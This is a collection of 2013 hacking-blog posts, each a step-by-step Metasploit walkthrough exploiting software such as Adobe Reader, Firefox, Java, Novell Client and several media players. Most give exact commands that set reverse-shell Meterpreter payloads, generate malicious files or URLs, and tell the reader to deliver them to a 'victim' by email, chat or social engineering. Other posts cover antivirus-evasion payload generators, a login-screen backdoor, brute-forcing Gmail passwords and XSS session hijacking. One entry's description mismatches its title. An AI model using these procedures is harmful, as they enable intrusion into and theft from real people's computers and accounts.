Hack Remote Windows PC Using AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass

May 24, 2013, 12:45 am

≫ Next: Ethical Hacking and Countermeasures: Secure Network Infrastructures by EC-Council

≪ Previous: Recover Deleted Data from Remote Victim PC

$

0

0

This module exploits vulnerability on Adobe Reader X Sandbox. The vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe process to write register values which can be used to trigger a buffer overflow on the AdobeCollabSync component, allowing achieving Medium Integrity Level privileges from a Low Integrity AcroRd32.exe process. This module has been tested successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.

Exploit Targets

Adobe Reader X 10.1.4

Windows 7

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘ps‘command displays a list of running processes on the target.

Migrate to the AcroRd32sandboxed process 

Now type use exploit/windows/local/adobe_sandbox_adobecollabsync

msf exploit (adobe_sandbox_adobecollabsync)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_sandbox_adobecollabsync)>set lhost 192.168.1.2 (IP of Local Host)

msf exploit (adobe_sandbox_adobecollabsync)>set session 1

msf exploit (adobe_sandbox_adobecollabsync)>exploit

---

Ethical Hacking and Countermeasures: Secure Network Infrastructures by EC-Council

May 27, 2013, 1:15 am

≫ Next: Hack Windows, Linux or MAC PC using Firefox 17.0.1 + Flash Privileged Code Injection

≪ Previous: Hack Remote Windows PC Using AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass

$

0

0

Download

Hack Windows, Linux or MAC PC using Firefox 17.0.1 + Flash Privileged Code Injection

May 28, 2013, 2:45 am

≫ Next: Veil - A Metasploit Payload Generator to Bypass Antivirus

≪ Previous: Ethical Hacking and Countermeasures: Secure Network Infrastructures by EC-Council

$

0

0

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG "use" element in the (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame's window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.

Exploit Targets

Firefox 17.0.1

Windows PC

Linux PC

MAC OS X PC

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/multi/browser/firefox_svg_plugin

msf exploit (firefox_svg_plugin)>set payload windows/meterpreter/reverse_tcp

msf exploit (firefox_svg_plugin)>set lhost 192.168.1.167 (IP of Local Host)

msf exploit (firefox_svg_plugin)>set srvhost 192.168.1.167 (This must be an address on the local machine)

msf exploit (firefox_svg_plugin)>set uripath / (The Url to use for this exploit)

msf exploit (firefox_svg_plugin)>exploit

Now an URL you should give to your victim http://192.168.1.167:8080/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Veil - A Metasploit Payload Generator to Bypass Antivirus

June 7, 2013, 1:07 am

≫ Next: How to Install Simple-Ducky Payload Generator

≪ Previous: Hack Windows, Linux or MAC PC using Firefox 17.0.1 + Flash Privileged Code Injection

$

0

0

Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.

First Download viel from hereand unzip file and save in your desktop

Run setup script on Kali x86 ./setup.sh

Now Install Python 2.7.5 in your pc

Now open Veil Folder and run ./Veil.py andchoose option 1

You can choose Metasploit’s standard msfvenom shellcode. I just chose the default, msfvenom

Now you can choose the type of payload, I just chose reverse TCP. Then enter the IP address of the Kali system and the port you want to use

Now select option 1 pyinstaller

This file should be placed in the \root\Desktop\Veil\dist\payload.exe

Open Kali terminal type msfconsole

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.174

set lport 4444

exploit

Now send your payload.exe files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

How to Install Simple-Ducky Payload Generator

June 8, 2013, 5:06 am

≫ Next: Hack Remote PC using Sun Java Web Start Double Quote Injection

≪ Previous: Veil - A Metasploit Payload Generator to Bypass Antivirus

$

0

0

Ducky currently uses version 2.6 of the duck encoder. The lastest version of the Simple-Ducky supports all Debian Linux distro's (i.e. Kali-Linux, Ubuntu, Linux Mint etc). The smart installer will take care of all the work for you.

With the simple-ducky in a matter of seconds you can;

Create your evil executable (its automatically placed in your web directory)

Create your inject.bin

Launch a listener (meterpreter or netcat)

Generate custom password list's

Crack extracted passwords

And so much more...

Dependencies

The following dependencies are automatically installed on version 1.1.0 and above;

Apache2

Pure-FTPD

Nautilus

GNOME-Terminal

GIT

WGET

Burp Suite

Social Engineering Tool Kit (SE-Toolkit)

Metasploit

p7zip-full

john

dfu-programmer

openjdk-7-jre-headless

samdump2

bkhive

Installing Simple-Ducky Payload Generator in Kali Linux

First Download Simple-Ducky Payload Generator from here(and save it on your desktop)

You will get the file with the name installer_V1.1.0_debian.sh

Give all the privileges to the this file by using “chmod”command as show below

chmod 777 installer_V1.1.0_debian.sh

Now install the downloaded package using  ./installer_V1.1.0_debian.sh

As a part of installation procedure setup will ask for updating of Java JDK version , select option 2 from the selection menu

In order to use this application, we need to have one user, Enter the name and password of primary user when prompted for (raj in this case)

Open new terminal and type ftp 127.0.0.1

You will be asked for user name and password for authentication, use the user name and password

Created above

After successful authentication, open new terminal and type simple-ducky

You will get the screen as shown below, which is a confirmation for installation of Simple-Ducky Payload Generator

Installation procedure of Simple-Ducky Payload Generator is complete, just keep connected for further usage of Simple-Ducky Payload  Generator in coming articles

Hack Remote PC using Sun Java Web Start Double Quote Injection

June 13, 2013, 1:57 am

≫ Next: Swaparoo: Meterpreter Script to Backdoor Windows

≪ Previous: How to Install Simple-Ducky Payload Generator

$

0

0

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. Parameters initial-heap-size and max-heap-size in a JNLP file can contain a double quote which is not properly sanitized when creating the command line for javaw.exe. This allows the injection of the -XXaltjvm option to load a jvm.dll from a remote UNC path into the java process. Thus an attacker can execute arbitrary code in the context of a browser user. This flaw was fixed in Oct. 2012 and affects JRE <= 1.6.35 and <= 1.7.07. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled. Alternatively an UNC path containing a jvm.dll can be specified with an own SMB server.

Exploit Targets

 Java Runtime 1.6.31

Requirement

Attacker: Kali Linux

Victim PC: Windows PC

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/browser/java_ws_double_quote

msf exploit (java_ws_double_quote)>set payload windows/meterpreter/reverse_tcp

msf exploit (java_ws_double_quote)>set lhost 192.168.1.167 (IP of Local Host)

msf exploit (java_ws_double_quote)>set srvhost 192.168.1.167 (This must be an address on the local machine)

msf exploit (java_ws_double_quote)>set uripath / (The Url to use for this exploit)

msf exploit (java_ws_double_quote)>exploit  

Now an URL you should give to your victim http://192.168.1.167:80

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Swaparoo: Meterpreter Script to Backdoor Windows

June 19, 2013, 6:32 am

≫ Next: Exploit Windows, Linux or MAC PC using Java Applet Driver Manager Privileged toString() Remote Code Execution

≪ Previous: Hack Remote PC using Sun Java Web Start Double Quote Injection

$

0

0

Swaparoo Windows backdoor method for Windows Vista/7/8. This code sneaks a backdoor command shell in place of Sticky Keys prompt or Utilman assistant at login screen.

First Download Swaparoo from here and unzip file and save in your desktop

In your kali linux copy Swaparoo.rb in  /opt/metasploit/apps/pro/msf3/scripts/Meterpreter

Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

After getting the Meterpreter session type run Swaparoo to replace sethc.exe with command prompt

Press shift key 5 times to open cmd prompt 

Run Swaparoo –u to replace Utilman.exe with cmd prompt

Exploit Windows, Linux or MAC PC using Java Applet Driver Manager Privileged toString() Remote Code Execution

June 20, 2013, 12:48 am

≫ Next: Blackhatonomics: An Inside Look at the Economics of Cybercrime

≪ Previous: Swaparoo: Meterpreter Script to Backdoor Windows

$

0

0

This module abuses the java.sql.DriverManager class where the toString() method is called over user supplied classes from a doPrivileged block. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java Web Start can be launched automatically through the ActiveX control. Otherwise, the applet is launched without click-to-play bypass.

Exploit Targets

Java 7 Update 17

Windows PC

Linux PC

MAC OS X PC

Requirement

Attacker: Kali Linux

Victim PC: Windows XP

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/browser/java_jre17_driver_manager

msf exploit (java_jre17_driver_manager)>set payload java/shell_reverse_tcp

msf exploit (java_jre17_driver_manager)>set lhost 192.168.1.158 (IP of Local Host)

msf exploit (java_jre17_driver_manager)>set srvhost 192.168.1.158 (This must be an address on the local machine)

msf exploit (java_jre17_driver_manager)>set uripath / (The Url to use for this exploit)

msf exploit (java_jre17_driver_manager)>exploit

Now an URL you should give to your victim http://192.168.1.158:8080

 Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

---

Blackhatonomics: An Inside Look at the Economics of Cybercrime

June 22, 2013, 11:43 pm

≫ Next: Hack Windows PC using Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation

≪ Previous: Exploit Windows, Linux or MAC PC using Java Applet Driver Manager Privileged toString() Remote Code Execution

$

0

0

Download

Hack Windows PC using Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation

June 24, 2013, 1:09 am

≫ Next: Hack Windows, Linux or MAC PC using Java Applet Provider Skeleton Insecure Invoke Method

≪ Previous: Blackhatonomics: An Inside Look at the Economics of Cybercrime

$

0

0

This module exploits a flaw in the nwfs.sys driver to overwrite data in kernel space. The corruption occurs while handling ioctl requests with code 0x1438BB, where a 0x00000009 dword is written to an arbitrary address. An entry within the HalDispatchTable is overwritten in order to execute arbitrary code when NtQueryIntervalProfile is called. The module has been tested successfully on Windows XP SP3 with Novell Client 4.91 SP4.

Exploit Targets

Novell Client 4.91 SP4

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/local/novell_client_nwfs

msf exploit (novell_client_nwfs)>set payload windows/meterpreter/reverse_tcp

msf exploit (novell_client_nwfs)>set lhost 192.168.1.114 (IP of Local Host)

msf exploit (novell_client_nwfs)>set srvhost 192.168.1.114 (IP of Local Host)

msf exploit (novell_client_nwfs)>set session 1

msf exploit (novell_client_nwfs)>exploit

Hack Windows, Linux or MAC PC using Java Applet Provider Skeleton Insecure Invoke Method

June 27, 2013, 12:47 am

≫ Next: Hack Remote Windows PC using ABBS Audio Media Player .LST Buffer Overflow

≪ Previous: Hack Windows PC using Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation

$

0

0

This module abuses the insecure invoke () method of the Provider Skeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier.

Exploit Targets

Windows PC

Linux PC

MAC PC

Java 7 update 21

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open Kali Linux terminal type msfconsole

Now type use exploit/multi/browser/java_jre17_provider_skeleton

msf exploit (java_jre17_provider_skeleton)>set payload java/Meterpreter/reverse_tcp

msf exploit (java_jre17_provider_skeleton)>set lhost 192.168.1.146 (IP of Local Host)

msf exploit (java_jre17_provider_skeleton)>set srvhost 192.168.1.146 (This must be an address on the local machine)

msf exploit (java_jre17_provider_skeleton)>set uripath / (The Url to use for this exploit)

msf exploit (java_jre17_provider_skeleton)>exploit

Now an URL you should give to your victim http://192.168.1.146:8080

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Remote Windows PC using ABBS Audio Media Player .LST Buffer Overflow

July 2, 2013, 11:24 pm

≫ Next: Hack Gmail Password using Hydra in kali Linux

≪ Previous: Hack Windows, Linux or MAC PC using Java Applet Provider Skeleton Insecure Invoke Method

$

0

0

This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability occurs when adding an .lst, allowing arbitrary code execution with the privileges of the user running the application. This module has been tested successfully on ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.

Exploit Targets

ABBS Audio Media Player 3.1

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/abbs_amp_lst

msf exploit (abbs_amp_lst)>set payload windows/meterpreter/reverse_tcp

msf exploit (abbs_amp_lst)>set lhost 192.168.1.115 (IP of Local Host)

msf exploit (abbs_amp_lst)>exploit  

After we successfully generate the malicious lst File, it will stored on your local computer

/root/.msf4/local/msf.lst

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.115

exploit

Now send your msf. lst files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Hack Gmail Password using Hydra in kali Linux

July 4, 2013, 12:38 am

≫ Next: Hack Windows 7 PC Remotely using ERS Viewer 2013 ERS File Handling Buffer Overflow

≪ Previous: Hack Remote Windows PC using ABBS Audio Media Player .LST Buffer Overflow

$

0

0

Open your Kali Linux terminal and Type xhydra and press enter

You can also do this manually. First Open Your Kali Linux and Follow this path

Kali Linux->Passwords Attacks->Online Attacks->Hydra

In the target tab, select

Single Target: smtp.gmail.com

Protocol: smtp

In passwords tab, select

Username: Type Victim Email ID

In the passwords, select the password list option and browse to select your

Passwords file. Here I have used my custom password file.

Now select start tab and click on start button, the password cracking begins and result is as follows

Hack Windows 7 PC Remotely using ERS Viewer 2013 ERS File Handling Buffer Overflow

July 9, 2013, 3:15 am

≫ Next: Hack Windows 7 PC Remotely using MediaCoder .M3U Buffer Overflow

≪ Previous: Hack Gmail Password using Hydra in kali Linux

$

0

0

This module exploits a buffer overflow vulnerability found in ERS Viewer 2013. The vulnerability exists in the module ermapper_u.dll, where the function rf_report_error handles user provided data in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2013 (versions 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.

Exploit Targets

ERS Viewer 2013

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/erdas_er_viewer_rf_report_error

msf exploit (erdas_er_viewer_rf_report_error)>set payload windows/meterpreter/reverse_tcp

msf exploit (erdas_er_viewer_rf_report_error)>set lhost 192.168.1.164 (IP of Local Host)

msf exploit (erdas_er_viewer_rf_report_error)>exploit

After we successfully generate the malicious ers File, it will stored on your local computer

/root/.msf4/local/msf.ers

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.164

exploit

Now send your msf.ers files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Hack Windows 7 PC Remotely using MediaCoder .M3U Buffer Overflow

July 14, 2013, 12:25 am

≫ Next: Exploit Remote Windows PC using Corel PDF Fusion Stack Buffer Overflow

≪ Previous: Hack Windows 7 PC Remotely using ERS Viewer 2013 ERS File Handling Buffer Overflow

$

0

0

This module exploits a buffer overflow in MediaCoder 0.8.22. The vulnerability occurs when adding an .m3u, allowing arbitrary code execution under the context of the user. DEP bypass via ROP is supported on Windows 7, since the MediaCoder runs with DEP. This module has been tested successfully on MediaCoder 0.8.21.5539 to 0.8.22.5530 over Windows XP SP3 and Windows 7 SP0.

Exploit Targets

MediaCoder 0.8.22

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/mediacoder_m3u

msf exploit (mediacoder_m3u)>set payload windows/meterpreter/reverse_tcp

msf exploit (mediacoder_m3u)>set lhost 192.168.1.147 (IP of Local Host)

msf exploit (mediacoder_m3u)>exploit

After we successfully generate the malicious m3u File, it will stored on your local computer

/root/.msf4/local/msf.m3u

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.147

exploit

Now send your msf.m3u files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

---

Exploit Remote Windows PC using Corel PDF Fusion Stack Buffer Overflow

July 14, 2013, 2:46 am

≫ Next: Hack Remote Windows PC using Apple Quicktime 7 Invalid Atom Length Buffer Overflow

≪ Previous: Hack Windows 7 PC Remotely using MediaCoder .M3U Buffer Overflow

$

0

0

This module exploits stack-based buffer overflow vulnerability in version 1.11 of Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry names. In order for the payload to be executed, an attacker must convince the target user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the attacker can execute arbitrary code as the target user.

Exploit Targets

Corel Pdf 1.11

Requirement

Attacker: Kali Linux

Victim PC: Windows XP SP 3

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/corelpdf_fusion_bof

msf exploit (corelpdf_fusion_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (corelpdf_fusion_bof)>set lhost 192.168.1.147 (IP of Local Host)

msf exploit (corelpdf_fusion_bof)>exploit

After we successfully generate the malicious xps File, it will stored on your local computer

/root/.msf4/local/msf.xps

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.147

exploit

Now send your msf.xps files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Hack Remote Windows PC using Apple Quicktime 7 Invalid Atom Length Buffer Overflow

July 27, 2013, 11:42 am

≫ Next: Bypass Antivirus and Hack Remote Windows PC with Syringe

≪ Previous: Exploit Remote Windows PC using Corel PDF Fusion Stack Buffer Overflow

$

0

0

This module exploits a stack buffer overflow in Cyber Link Power2Go version 8.x the vulnerability is triggered when opening a malformed p2g file containing an overly long string in the 'name' attribute of the file element. This results in overwriting a structured exception handler record.

Exploit Targets

Apple Quicktime 7.7.3

Internet Explorer 8

Windows XP SP3

Requirement

Attacker: Kali Linux

Victim PC: Windows XP

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/apple_quicktime_rdrf

msf exploit (apple_quicktime_rdrf)>set payload windows/meterpreter/reverse_tcp

msf exploit (apple_quicktime_rdrf)>set lhost 192.168.1.6 (IP of Local Host)

msf exploit (apple_quicktime_rdrf)>exploit  

After we successfully generate the malicious mov File, it will stored on your local computer

/root/.msf4/local/msf.mov

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.6

exploit

Now send your msf.mov files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Bypass Antivirus and Hack Remote Windows PC with Syringe

August 7, 2013, 4:03 am

≫ Next: XSSF Cross-Site Scripting Framework in Metasploit

≪ Previous: Hack Remote Windows PC using Apple Quicktime 7 Invalid Atom Length Buffer Overflow

$

0

0

First Download syringe-antivirus-bypass fromHere

Now untar the file tar xvf syringe.tar

Now you can start it with ./syringe.sh

After we successfully generate the malicious exe File, it will stored on your local computer

/Home/Desktop/syringe/backdoor.exe

Now send your backdoor.exe files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

XSSF Cross-Site Scripting Framework in Metasploit

August 12, 2013, 4:31 am

≫ Next: Hack Remote Windows 7 PC using Chasys Draw IES Buffer Overflow

≪ Previous: Bypass Antivirus and Hack Remote Windows PC with Syringe

$

0

0

The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. The XSSF project aims to demonstrate the real dangers of XSS vulnerabilities, vulgarizing their exploitation. This project is created solely for education, penetration testing and lawful research purposes.

XSSF allows creating a communication channel with the targeted browser (from a XSS vulnerability) in order to perform further attacks. Users are free to select existing modules (a module = an attack) in order to target specific browsers.

XSSF provides a powerful documented API, which facilitates development of modules and attacks. In addition, its integration into the Metasploit Framework allows users to launch MSF browser based exploit easily from XSS vulnerability.

In addition, an interesting though exploiting an XSS inside a victim's browser could be to browse website on attacker's browser, using the connected victim's session. In most of cases, simply stealing the victim cookie will be sufficient to realize this action. But in minority of cases (intranets, network tools portals, etc.), cookie won't be useful for an external attacker. That's why XSSF Tunnel was created to help the attacker to help the attacker browsing on affected domain using the victim's session.

Open your kali Linux terminal and type cd /opt/metasploit/apps/pro/msf3

In msf3 install xssf using following command

Svn export http://xssf.googlecode.com/svn/trunk ./ --force now xssf is successfully install in your metasploit

Load XSSF plugin using the command 'load xssf'

Type help xssfto find all xssf commands

Now use xssf_urlscommand to get all list of all available URL

Send the link of the server to the victim via chat or email or any social engineering technique.

We can see information related to any of the victims using the command xssf_information

Hack Remote Windows 7 PC using Chasys Draw IES Buffer Overflow

August 12, 2013, 11:50 pm

≫ Next: Hack FTP Remotely using Open-FTPD 1.2 Arbitrary File Upload

≪ Previous: XSSF Cross-Site Scripting Framework in Metasploit

$

0

0

This module exploits a buffer overflow vulnerability found in Chasys Draw IES (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, whileparsing BMP files, where the ReadFile function is used to store user provided data on the  stack in a insecure way. It results in arbitrary code execution under thecontext of the user viewing a specially crafted BMP file. This module has been tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7SP1.

Exploit Targets

Chasys Draw IES 4.10.01

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/chasys_draw_ies_bmp_bof

msf exploit (chasys_draw_ies_bmp_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (chasys_draw_ies_bmp_bof)>set lhost 192.168.1.137 (IP of Local Host)

msf exploit (chasys_draw_ies_bmp_bof)>exploit   

After we successfully generate the malicious bmpFile, it will stored on your local computer

/root/.msf4/local/msf.bmp

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.137

exploit

Now send your msf.bmp files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.